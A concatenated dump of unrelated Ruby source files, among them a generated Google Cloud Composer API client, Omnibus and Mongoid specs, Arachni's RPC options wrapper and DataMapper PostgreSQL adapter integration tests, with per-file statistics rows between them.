# It must match the regular expression `composer-([0-9]+\.[0-9]+\.[0-9]+|latest)-
# airflow-[0-9]+\.[0-9]+(\.[0-9]+.*)?`. When used as input, the server also
# checks if the provided version is supported and denies the request for an
# unsupported version. The Cloud Composer portion of the version is a [semantic
# version](https://semver.org) or `latest`. When the patch version is omitted,
# the current Cloud Composer patch version is selected. When `latest` is
# provided instead of an explicit version number, the server replaces `latest`
# with the current Cloud Composer version and stores that version number in the
# same field. The portion of the image version that follows *airflow-* is an
# official Apache Airflow repository [release name](https://github.com/apache/
# incubator-airflow/releases). See also [Version List](/composer/docs/concepts/
# versioning/composer-versions).
# Corresponds to the JSON property `imageVersion`
# @return [String]
attr_accessor :image_version
# Optional. Custom Python Package Index (PyPI) packages to be installed in the
# environment. Keys refer to the lowercase package name such as "numpy" and
# values are the lowercase extras and version specifier such as "==1.12.0", "[
# devel,gcp_api]", or "[devel]>=1.8.2, <1.9.2". To specify a package without
# pinning it to a version specifier, use the empty string as the value.
# Corresponds to the JSON property `pypiPackages`
# @return [Hash<String,String>]
attr_accessor :pypi_packages
# Optional. The major version of Python used to run the Apache Airflow scheduler,
# worker, and webserver processes. Can be set to '2' or '3'. If not specified,
# the default is '2'. Cannot be updated.
# Corresponds to the JSON property `pythonVersion`
# @return [String]
attr_accessor :python_version
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@airflow_config_overrides = args[:airflow_config_overrides] if args.key?(:airflow_config_overrides)
@env_variables = args[:env_variables] if args.key?(:env_variables)
@image_version = args[:image_version] if args.key?(:image_version)
@pypi_packages = args[:pypi_packages] if args.key?(:pypi_packages)
@python_version = args[:python_version] if args.key?(:python_version)
end
end
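      # Illustrative construction (not part of the generated client): override keys use the
      # "section-property" form and PyPI keys map package names to version specifiers, as
      # documented above; the concrete values are examples only.
      #
      #   config = Google::Apis::ComposerV1beta1::SoftwareConfig.new(
      #     airflow_config_overrides: { 'core-dags_are_paused_at_creation' => 'True' },
      #     pypi_packages: { 'numpy' => '==1.12.0', 'requests' => '' },
      #     python_version: '3')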
# The `Status` type defines a logical error model that is suitable for different
# programming environments, including REST APIs and RPC APIs. It is used by [
# gRPC](https://github.com/grpc). Each `Status` message contains three pieces of
# data: error code, error message, and error details. You can find out more
# about this error model and how to work with it in the [API Design Guide](https:
# //cloud.google.com/apis/design/errors).
class Status
include Google::Apis::Core::Hashable
# The status code, which should be an enum value of google.rpc.Code.
# Corresponds to the JSON property `code`
# @return [Fixnum]
attr_accessor :code
# A list of messages that carry the error details. There is a common set of
# message types for APIs to use.
# Corresponds to the JSON property `details`
# @return [Array<Hash<String,Object>>]
attr_accessor :details
# A developer-facing error message, which should be in English. Any user-facing
# error message should be localized and sent in the google.rpc.Status.details
# field, or localized by the client.
# Corresponds to the JSON property `message`
# @return [String]
attr_accessor :message
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@code = args[:code] if args.key?(:code)
@details = args[:details] if args.key?(:details)
@message = args[:message] if args.key?(:message)
end
end
# The configuration settings for the Airflow web server App Engine instance.
class WebServerConfig
include Google::Apis::Core::Hashable
# Optional. Machine type on which Airflow web server is running. It has to be
# one of: composer-n1-webserver-2, composer-n1-webserver-4 or composer-n1-
# webserver-8. If not specified, composer-n1-webserver-2 will be used. Value
# custom is returned only in response, if Airflow web server parameters were
        # manually changed to non-standard values.
# Corresponds to the JSON property `machineType`
# @return [String]
attr_accessor :machine_type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@machine_type = args[:machine_type] if args.key?(:machine_type)
end
end
# Network-level access control policy for the Airflow web server.
class WebServerNetworkAccessControl
include Google::Apis::Core::Hashable
# A collection of allowed IP ranges with descriptions.
# Corresponds to the JSON property `allowedIpRanges`
# @return [Array<Google::Apis::ComposerV1beta1::AllowedIpRange>]
attr_accessor :allowed_ip_ranges
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@allowed_ip_ranges = args[:allowed_ip_ranges] if args.key?(:allowed_ip_ranges)
end
end
end
end
end
| 47.362264 | 136 | 0.650725 |
91b2e79155d00126880da9cab64d7b802da9c50a | 215 | # frozen_string_literal: true
ActiveRecord::Schema.define do
create_enum :shirt_size, %w[small medium large]
create_table :shirts do |t|
t.string :name
t.enum :size, enum_type: :shirt_size
end
end
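# Usage sketch (assumes a Shirt model backed by the table above is defined elsewhere);
# the size value must be one of the enum labels small, medium, or large.
#
#   Shirt.create!(name: 'Basic Tee', size: 'medium')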
| 19.545455 | 49 | 0.72093 |
79a04cf64b9222e969148427e8f9946bdcc86fae | 2,744 | require 'spec_helper'
module Omnibus
describe ManifestDiff do
def manifest_entry_for(name, dv, lv)
Omnibus::ManifestEntry.new(name, {:described_version => dv,
:locked_version => lv,
:locked_source => {
:git => "git://#{name}@example.com"},
:source_type => :git
})
end
let(:manifest_one) do
m = Omnibus::Manifest.new()
m.add("foo", manifest_entry_for("foo", "1.2.4", "deadbeef"))
m.add("bar", manifest_entry_for("bar", "1.2.4", "deadbeef"))
m
end
let(:manifest_two) do
m = Omnibus::Manifest.new()
m.add("foo", manifest_entry_for("foo", "1.2.5", "deadbea0"))
m.add("baz", manifest_entry_for("baz", "1.2.4", "deadbeef"))
m
end
subject { described_class.new(manifest_one, manifest_two)}
describe "#updated" do
it "returns items that existed in the first manifest but have been changed" do
expect(subject.updated).to eq([{ :name => "foo",
:old_version => "deadbeef",
:new_version => "deadbea0",
:source_type => :git,
:source => {:git => "git://[email protected]"}
}])
end
describe "#removed" do
it "returns items that existed in the first manfiest but don't exist in the second" do
expect(subject.removed).to eq([{ :name => "bar",
:old_version => "deadbeef",
:source_type => :git,
:source => {:git => "git://[email protected]"}
}])
end
end
describe "#added" do
it "returns items that did not exist in the first manifest but do exist in the second" do
expect(subject.added).to eq([{ :name => "baz",
:new_version => "deadbeef",
:source_type => :git,
:source => {:git => "git://[email protected]"}
}])
end
end
describe "#empty?" do
it "returns false if there have been changes" do
expect(subject.empty?).to eq(false)
end
it "returns true if nothing changed" do
diff = Omnibus::ManifestDiff.new(manifest_one, manifest_one)
expect(diff.empty?).to eq(true)
end
end
end
end
end
| 37.081081 | 97 | 0.448251 |
6182200c855bce91919b07c6a0915616fddd20a6 | 1,295 | # frozen_string_literal: true
require "spec_helper"
describe Mongoid::Matchable::Regexp do
let(:matcher) do
described_class.new(attribute)
end
let(:attribute) do
'Emily'
end
describe '#_matches?' do
context 'when a BSON::Regexp::Raw object is passed' do
let(:regexp) do
BSON::Regexp::Raw.new('^Em')
end
it 'compiles the regexp object to a native regexp for the matching' do
expect(matcher._matches?(regexp)).to be(true)
end
context 'when the value does not match the attribute' do
let(:attribute) do
'ily'
end
it 'compiles the regexp object to a native regexp for the matching' do
expect(matcher._matches?(regexp)).to be(false)
end
end
end
context 'when a native Regexp object is passed' do
let(:regexp) do
/^Em/
end
it 'calls super with the native regexp' do
expect(matcher._matches?(regexp)).to be(true)
end
context 'when the value does not match the attribute' do
let(:attribute) do
'ily'
end
it 'compiles the regexp object to a native regexp for the matching' do
expect(matcher._matches?(regexp)).to be(false)
end
end
end
end
end
| 20.887097 | 78 | 0.609266 |
218dab2d72a2b24f2c72ef55a49300bf6cdca15a | 372 | class AddMsgParametersToProviderAccounts < ActiveRecord::Migration
def self.up
add_column :provider_accounts, :msg_account_id, :string
add_column :provider_accounts, :auto_lock_instances, :boolean, :default => false
end
def self.down
remove_column :provider_accounts, :msg_account_id
remove_column :provider_accounts, :auto_lock_instances
end
end
| 31 | 84 | 0.790323 |
91312dd1e9b849f9aca9337f8fcec7d87fd46910 | 77 | module Cmor::Rbac
class RolePolicy # < Itsf::Backend::BasePolicy
end
end
| 15.4 | 48 | 0.727273 |
330f778f6089b6a806c2fd1614537396ddae26f2 | 561 | require 'fileutils'
require 'test/unit'
module Multiverse
ROOT = File.expand_path(File.join(File.dirname(__FILE__), '..', '..'))
$: << File.expand_path(File.join(ROOT, 'lib'))
# Include from our unit testing path to share fake_collector and fake_service
$: << File.expand_path(File.join(ROOT, '..', 'new_relic'))
SUITES_DIRECTORY = ENV['SUITES_DIRECTORY'] || File.join(ROOT, '/suites')
require 'multiverse/color'
require 'multiverse/output_collector'
require 'multiverse/runner'
require 'multiverse/envfile'
require 'multiverse/suite'
end
| 33 | 79 | 0.720143 |
f737f7b289c7359e787c116b6784002c98892cf1 | 2,373 | =begin
Copyright 2010-2014 Tasos Laskos <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
module Arachni
module RPC
class Server
#
# It, for the most part, forwards calls to {::Arachni::Options} and intercepts
# a few that need to be updated at other places throughout the framework.
#
# @author Tasos "Zapotek" Laskos <[email protected]>
#
class ActiveOptions
def initialize( framework )
@opts = framework.opts
%w( url http_req_limit http_timeout user_agent redirect_limit proxy_username
proxy_password proxy_type proxy_host proxy_port authed_by cookies
cookie_string http_username http_password ).each do |m|
m = "#{m}=".to_sym
self.class.class_eval do
define_method m do |v|
@opts.send( m, v )
HTTP.reset false
v
end
end
end
(@opts.public_methods( false ) - public_methods( false ) ).each do |m|
self.class.class_eval do
define_method m do |*args|
@opts.send( m, *args )
end
end
end
end
# @see Arachni::Options#set
def set( options )
options.each do |k, v|
begin
send( "#{k.to_s}=", v )
rescue => e
#ap e
#ap e.backtrace
end
end
HTTP.reset false
true
end
def proxy=( proxy_url )
@opts.proxy_host, @opts.proxy_port = proxy_url.to_s.split( /:/ )
@opts.proxy_port = @opts.proxy_port.to_i
HTTP.reset false
@opts.proxy = proxy_url
end
def cookie_jar=( cookie_jar )
HTTP.update_cookies( cookie_jar )
@cookie_jar = cookie_jar
end
end
end
end
end
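# Usage sketch (illustrative, not from the original file): #set routes each key to the
# matching writer and refreshes the HTTP layer once; the framework object and values
# below are hypothetical.
#
#   active = Arachni::RPC::Server::ActiveOptions.new( framework )
#   active.set( 'http_timeout' => 50_000, 'user_agent' => 'Arachni/spec' )
#   active.proxy = 'localhost:8080'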
| 26.965909 | 84 | 0.597134 |
b98c7dcae4895f64d8e4feceabf63ee4b4514a5a | 21,375 | require 'pathname'
require Pathname(__FILE__).dirname.expand_path.parent + 'spec_helper'
require ROOT_DIR + 'lib/data_mapper'
begin
require 'do_postgres'
DataMapper.setup(:postgres, ENV["POSTGRES_SPEC_URI"] || "postgres://postgres@localhost/dm_core_test")
describe DataMapper::Adapters::DataObjectsAdapter do
before do
@adapter = repository(:postgres).adapter
end
describe "reading & writing a database" do
before do
@adapter.execute('DROP TABLE IF EXISTS "users"')
@adapter.execute('DROP SEQUENCE IF EXISTS "users_id_seq"')
end
before do
@adapter.execute('CREATE SEQUENCE "users_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "users" (
"id" INT4 DEFAULT nextval('users_id_seq') NOT NULL,
"name" TEXT
)
EOS
@adapter.execute("INSERT INTO users (name) VALUES ('Paul')")
end
it 'should be able to #execute an arbitrary query' do
result = @adapter.execute("INSERT INTO users (name) VALUES ('Sam')")
result.affected_rows.should == 1
end
it 'should be able to #query' do
result = @adapter.query("SELECT * FROM users")
result.should be_kind_of(Array)
row = result.first
row.should be_kind_of(Struct)
row.members.should == %w{id name}
row.id.should == 1
row.name.should == 'Paul'
end
it 'should return an empty array if #query found no rows' do
@adapter.execute("DELETE FROM users")
result = nil
lambda { result = @adapter.query("SELECT * FROM users") }.should_not raise_error
result.should be_kind_of(Array)
result.size.should == 0
end
end
describe "CRUD for serial Key" do
before do
@adapter.execute('DROP TABLE IF EXISTS "video_games"')
@adapter.execute('DROP SEQUENCE IF EXISTS "video_games_id_seq"')
end
before do
class VideoGame
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
end
@adapter.execute('CREATE SEQUENCE "video_games_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "video_games" (
"id" INT4 DEFAULT nextval('video_games_id_seq') NOT NULL,
"name" VARCHAR(50)
)
EOS
end
it 'should be able to create a record' do
game = VideoGame.new(:name => 'System Shock')
repository(:postgres).save(game)
game.should_not be_a_new_record
game.should_not be_dirty
@adapter.query('SELECT "id" FROM "video_games" WHERE "name" = ?', game.name).first.should == game.id
@adapter.execute('DELETE FROM "video_games" WHERE "id" = ? RETURNING id', game.id).to_i.should == 1
end
it 'should be able to read a record' do
name = 'Wing Commander: Privateer'
id = @adapter.execute('INSERT INTO "video_games" ("name") VALUES (?) RETURNING id', name).insert_id
game = repository(:postgres).get(VideoGame, [id])
game.name.should == name
game.should_not be_dirty
game.should_not be_a_new_record
@adapter.execute('DELETE FROM "video_games" WHERE "name" = ?', name)
end
it 'should be able to update a record' do
name = 'Resistance: Fall of Mon'
id = @adapter.execute('INSERT INTO "video_games" ("name") VALUES (?) RETURNING id', name).insert_id
game = repository(:postgres).get(VideoGame, [id])
game.name = game.name.sub(/Mon/, 'Man')
game.should_not be_a_new_record
game.should be_dirty
repository(:postgres).save(game)
game.should_not be_dirty
clone = repository(:postgres).get(VideoGame, [id])
clone.name.should == game.name
@adapter.execute('DELETE FROM "video_games" WHERE "id" = ?', id)
end
it 'should be able to delete a record' do
name = 'Zelda'
id = @adapter.execute('INSERT INTO "video_games" ("name") VALUES (?) RETURNING id', name).insert_id
game = repository(:postgres).get(VideoGame, [id])
game.name.should == name
repository(:postgres).destroy(game).should be_true
game.should be_a_new_record
game.should be_dirty
end
it 'should respond to Resource#get' do
name = 'Contra'
id = @adapter.execute('INSERT INTO "video_games" ("name") VALUES (?) RETURNING id', name).insert_id
contra = repository(:postgres) { VideoGame.get(id) }
contra.should_not be_nil
contra.should_not be_dirty
contra.should_not be_a_new_record
contra.id.should == id
end
end
describe "CRUD for Composite Key" do
before do
@adapter.execute('DROP TABLE IF EXISTS "bank_customers"')
end
before do
class BankCustomer
include DataMapper::Resource
property :bank, String, :key => true
property :account_number, String, :key => true
property :name, String
end
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "bank_customers" (
"bank" VARCHAR(50),
"account_number" VARCHAR(50),
"name" VARCHAR(50)
)
EOS
end
it 'should be able to create a record' do
        customer = BankCustomer.new(:bank => 'Community Bank', :account_number => '123456', :name => 'David Hasselhoff')
repository(:postgres).save(customer)
customer.should_not be_a_new_record
customer.should_not be_dirty
row = @adapter.query('SELECT "bank", "account_number" FROM "bank_customers" WHERE "name" = ?', customer.name).first
row.bank.should == customer.bank
row.account_number.should == customer.account_number
end
it 'should be able to read a record' do
bank, account_number, name = 'Chase', '4321', 'Super Wonderful'
@adapter.execute('INSERT INTO "bank_customers" ("bank", "account_number", "name") VALUES (?, ?, ?)', bank, account_number, name)
repository(:postgres).get(BankCustomer, [bank, account_number]).name.should == name
@adapter.execute('DELETE FROM "bank_customers" WHERE "bank" = ? AND "account_number" = ?', bank, account_number)
end
it 'should be able to update a record' do
bank, account_number, name = 'Wells Fargo', '00101001', 'Spider Pig'
@adapter.execute('INSERT INTO "bank_customers" ("bank", "account_number", "name") VALUES (?, ?, ?)', bank, account_number, name)
customer = repository(:postgres).get(BankCustomer, [bank, account_number])
customer.name = 'Bat-Pig'
customer.should_not be_a_new_record
customer.should be_dirty
repository(:postgres).save(customer)
customer.should_not be_dirty
clone = repository(:postgres).get(BankCustomer, [bank, account_number])
clone.name.should == customer.name
@adapter.execute('DELETE FROM "bank_customers" WHERE "bank" = ? AND "account_number" = ?', bank, account_number)
end
it 'should be able to delete a record' do
bank, account_number, name = 'Megacorp', 'ABC', 'Flash Gordon'
@adapter.execute('INSERT INTO "bank_customers" ("bank", "account_number", "name") VALUES (?, ?, ?)', bank, account_number, name)
customer = repository(:postgres).get(BankCustomer, [bank, account_number])
customer.name.should == name
repository(:postgres).destroy(customer).should be_true
customer.should be_a_new_record
customer.should be_dirty
end
it 'should respond to Resource#get' do
bank, account_number, name = 'Conchords', '1100101', 'Robo Boogie'
@adapter.execute('INSERT INTO "bank_customers" ("bank", "account_number", "name") VALUES (?, ?, ?)', bank, account_number, name)
robots = repository(:postgres) { BankCustomer.get(bank, account_number) }
robots.should_not be_nil
robots.should_not be_dirty
robots.should_not be_a_new_record
robots.bank.should == bank
robots.account_number.should == account_number
end
end
describe "Ordering a Query" do
before do
@adapter.execute('DROP TABLE IF EXISTS "sail_boats"')
@adapter.execute('DROP SEQUENCE IF EXISTS "sail_boats_id_seq"')
end
before do
class SailBoat
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
property :port, String
class << self
def property_by_name(name)
properties(repository.name)[name]
end
end
end
@adapter.execute('CREATE SEQUENCE "sail_boats_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "sail_boats" (
"id" INT4 DEFAULT nextval('sail_boats_id_seq') NOT NULL,
"name" VARCHAR(50),
"port" VARCHAR(50)
)
EOS
repository(:postgres).save(SailBoat.new(:id => 1, :name => "A", :port => "C"))
repository(:postgres).save(SailBoat.new(:id => 2, :name => "B", :port => "B"))
repository(:postgres).save(SailBoat.new(:id => 3, :name => "C", :port => "A"))
end
it "should order results" do
result = repository(:postgres).all(SailBoat,{:order => [
DataMapper::Query::Direction.new(SailBoat.property_by_name(:name), :asc)
]})
result[0].id.should == 1
result = repository(:postgres).all(SailBoat,{:order => [
DataMapper::Query::Direction.new(SailBoat.property_by_name(:port), :asc)
]})
result[0].id.should == 3
result = repository(:postgres).all(SailBoat,{:order => [
DataMapper::Query::Direction.new(SailBoat.property_by_name(:name), :asc),
DataMapper::Query::Direction.new(SailBoat.property_by_name(:port), :asc)
]})
result[0].id.should == 1
result = repository(:postgres).all(SailBoat,{:order => [
SailBoat.property_by_name(:name),
DataMapper::Query::Direction.new(SailBoat.property_by_name(:port), :asc)
]})
result[0].id.should == 1
end
end
describe "Lazy Loaded Properties" do
before do
@adapter.execute('DROP TABLE IF EXISTS "sail_boats"')
@adapter.execute('DROP SEQUENCE IF EXISTS "sail_boats_id_seq"')
end
before do
class SailBoat
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :notes, String, :lazy => [:notes]
property :trip_report, String, :lazy => [:notes,:trip]
property :miles, Fixnum, :lazy => [:trip]
class << self
def property_by_name(name)
properties(repository.name)[name]
end
end
end
@adapter.execute('CREATE SEQUENCE "sail_boats_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "sail_boats" (
"id" INT4 DEFAULT nextval('sail_boats_id_seq') NOT NULL,
"notes" VARCHAR(50),
"trip_report" VARCHAR(50),
"miles" INTEGER
)
EOS
repository(:postgres).save(SailBoat.new(:id => 1, :notes=>'Note',:trip_report=>'Report',:miles=>23))
repository(:postgres).save(SailBoat.new(:id => 2, :notes=>'Note',:trip_report=>'Report',:miles=>23))
repository(:postgres).save(SailBoat.new(:id => 3, :notes=>'Note',:trip_report=>'Report',:miles=>23))
end
it "should lazy load" do
result = repository(:postgres).all(SailBoat,{})
result[0].instance_variables.should_not include('@notes')
result[0].instance_variables.should_not include('@trip_report')
result[1].instance_variables.should_not include('@notes')
result[0].notes.should_not be_nil
result[1].instance_variables.should include('@notes')
result[1].instance_variables.should include('@trip_report')
result[1].instance_variables.should_not include('@miles')
result = repository(:postgres).all(SailBoat,{})
result[0].instance_variables.should_not include('@trip_report')
result[0].instance_variables.should_not include('@miles')
result[1].trip_report.should_not be_nil
result[2].instance_variables.should include('@miles')
end
end
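# Finder-level behaviour: row counts, :limit/:offset, partial field selection
# with lazy loading of the omitted columns, and Array values being translated
# into SQL IN clauses.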
describe "finders" do
before do
@adapter.execute('DROP TABLE IF EXISTS "serial_finder_specs"')
@adapter.execute('DROP SEQUENCE IF EXISTS "serial_finder_specs_id_seq"')
end
before do
class SerialFinderSpec
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :sample, String
end
@adapter.execute('CREATE SEQUENCE "serial_finder_specs_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "serial_finder_specs" (
"id" INT4 DEFAULT nextval('serial_finder_specs_id_seq') NOT NULL,
"sample" VARCHAR(50)
)
EOS
# Why do we keep testing through Repository instead of the models directly?
# Because we want to exercise the code actually under test as directly
# as possible.
setup_repository = repository(:postgres)
100.times do
setup_repository.save(SerialFinderSpec.new(:sample => rand.to_s))
end
end
it "should return all available rows" do
repository(:postgres).all(SerialFinderSpec, {}).should have(100).entries
end
it "should allow limit and offset" do
repository(:postgres).all(SerialFinderSpec, { :limit => 50 }).should have(50).entries
repository(:postgres).all(SerialFinderSpec, { :limit => 20, :offset => 40 }).map(&:id).should ==
repository(:postgres).all(SerialFinderSpec, {})[40...60].map(&:id)
end
it "should lazy-load missing attributes" do
sfs = repository(:postgres).all(SerialFinderSpec, { :fields => [:id], :limit => 1 }).first
sfs.should be_a_kind_of(SerialFinderSpec)
sfs.should_not be_a_new_record
sfs.instance_variables.should_not include('@sample')
sfs.sample.should_not be_nil
end
it "should translate an Array to an IN clause" do
ids = repository(:postgres).all(SerialFinderSpec, { :limit => 10 }).map(&:id)
results = repository(:postgres).all(SerialFinderSpec, { :id => ids })
results.size.should == 10
results.map(&:id).should == ids
end
end
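# many_to_one: a Yard belongs to an Engine via engine_id; covers reading,
# substituting and saving the parent through the association.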
describe "many_to_one associations" do
before do
@adapter.execute('DROP TABLE IF EXISTS "engines"')
@adapter.execute('DROP SEQUENCE IF EXISTS "engines_id_seq"')
@adapter.execute('DROP TABLE IF EXISTS "yards"')
@adapter.execute('DROP SEQUENCE IF EXISTS "yards_id_seq"')
end
before do
class Engine
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
end
@adapter.execute('CREATE SEQUENCE "engines_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "engines" (
"id" INT4 DEFAULT nextval('engines_id_seq') NOT NULL,
"name" VARCHAR(50)
)
EOS
@adapter.execute('INSERT INTO "engines" ("id", "name") values (?, ?)', 1, 'engine1')
@adapter.execute('INSERT INTO "engines" ("id", "name") values (?, ?)', 2, 'engine2')
class Yard
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
repository(:postgres) do
many_to_one :engine
end
end
@adapter.execute('CREATE SEQUENCE "yards_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "yards" (
"id" INT4 DEFAULT nextval('yards_id_seq') NOT NULL,
"name" VARCHAR(50),
"engine_id" INTEGER
)
EOS
@adapter.execute('INSERT INTO "yards" ("id", "name", "engine_id") values (?, ?, ?)', 1, 'yard1', 1)
end
it "should load without the parent"
it 'should allow substituting the parent' do
y = repository(:postgres).all(Yard, :id => 1).first
e = repository(:postgres).all(Engine, :id => 2).first
y.engine = e
repository(:postgres).save(y)
y = repository(:postgres).all(Yard, :id => 1).first
y[:engine_id].should == 2
end
it "#many_to_one" do
yard = Yard.new
yard.should respond_to(:engine)
yard.should respond_to(:engine=)
end
it "should load the associated instance" do
y = repository(:postgres).all(Yard, :id => 1).first
y.engine.should_not be_nil
y.engine.id.should == 1
y.engine.name.should == "engine1"
end
it 'should save the association key in the child' do
e = repository(:postgres).all(Engine, :id => 2).first
repository(:postgres).save(Yard.new(:id => 2, :name => 'yard2', :engine => e))
repository(:postgres).all(Yard, :id => 2).first[:engine_id].should == 2
end
it 'should save the parent upon saving of child' do
e = Engine.new(:id => 10, :name => "engine10")
y = Yard.new(:id => 10, :name => "Yard10", :engine => e)
repository(:postgres).save(y)
y[:engine_id].should == 10
repository(:postgres).all(Engine, :id => 10).first.should_not be_nil
end
end
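# one_to_many: a Host has many Slices via host_id; covers loading, appending
# and removing children, and cascading saves from the parent.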
describe "one_to_many associations" do
before do
@adapter.execute('DROP TABLE IF EXISTS "hosts"')
@adapter.execute('DROP SEQUENCE IF EXISTS "hosts_id_seq"')
@adapter.execute('DROP TABLE IF EXISTS "slices"')
@adapter.execute('DROP SEQUENCE IF EXISTS "slices_id_seq"')
end
before do
class Host
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
repository(:postgres) do |context|
one_to_many :slices, :test => context
end
end
@adapter.execute('CREATE SEQUENCE "hosts_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "hosts" (
"id" INT4 DEFAULT nextval('hosts_id_seq') NOT NULL,
"name" VARCHAR(50)
)
EOS
@adapter.execute('INSERT INTO "hosts" ("id", "name") values (?, ?)', 1, 'host1')
@adapter.execute('INSERT INTO "hosts" ("id", "name") values (?, ?)', 2, 'host2')
class Slice
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
repository(:postgres) do
many_to_one :host
end
end
@adapter.execute('CREATE SEQUENCE "slices_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "slices" (
"id" INT4 DEFAULT nextval('slices_id_seq') NOT NULL,
"name" VARCHAR(50),
"host_id" INTEGER
)
EOS
@adapter.execute('INSERT INTO "slices" ("id", "name", "host_id") values (?, ?, ?)', 1, 'slice1', 1)
@adapter.execute('INSERT INTO "slices" ("id", "name", "host_id") values (?, ?, ?)', 2, 'slice2', 1)
end
it "#one_to_many" do
h = Host.new
h.should respond_to(:slices)
end
it "should allow removal of a child through a loaded association" do
h = repository(:postgres).all(Host, :id => 1).first
s = h.slices.first
h.slices.delete(s)
h.slices.size.should == 1
s = repository(:postgres).first(Slice, :id => s.id)
s.host.should be_nil
s[:host_id].should be_nil
end
it "should load the associated instances" do
h = repository(:postgres).all(Host, :id => 1).first
h.slices.should_not be_nil
h.slices.size.should == 2
h.slices.first.id.should == 1
h.slices.last.id.should == 2
end
it "should add and save the associated instance" do
h = repository(:postgres).all(Host, :id => 1).first
h.slices << Slice.new(:id => 3, :name => 'slice3')
s = repository(:postgres).all(Slice, :id => 3).first
s.host.id.should == 1
end
it "should not save the associated instance if the parent is not saved" do
h = Host.new(:id => 10, :name => "host10")
h.slices << Slice.new(:id => 10, :name => 'slice10')
repository(:postgres).all(Slice, :id => 10).first.should be_nil
end
it "should save the associated instance upon saving of parent" do
h = Host.new(:id => 10, :name => "host10")
h.slices << Slice.new(:id => 10, :name => 'slice10')
repository(:postgres).save(h)
s = repository(:postgres).all(Slice, :id => 10).first
s.should_not be_nil
s.host.should_not be_nil
s.host.id.should == 10
end
end
end
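# If the do_postgres driver cannot be loaded, fail loudly so the missing
# PostgreSQL integration coverage is visible rather than silently skipped.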
rescue LoadError => e
describe 'do_postgres' do
it 'should be required' do
fail "PostgreSQL integration specs not run! Could not load do_postgres: #{e}"
end
end
end
| 33.928571 | 136 | 0.600889 |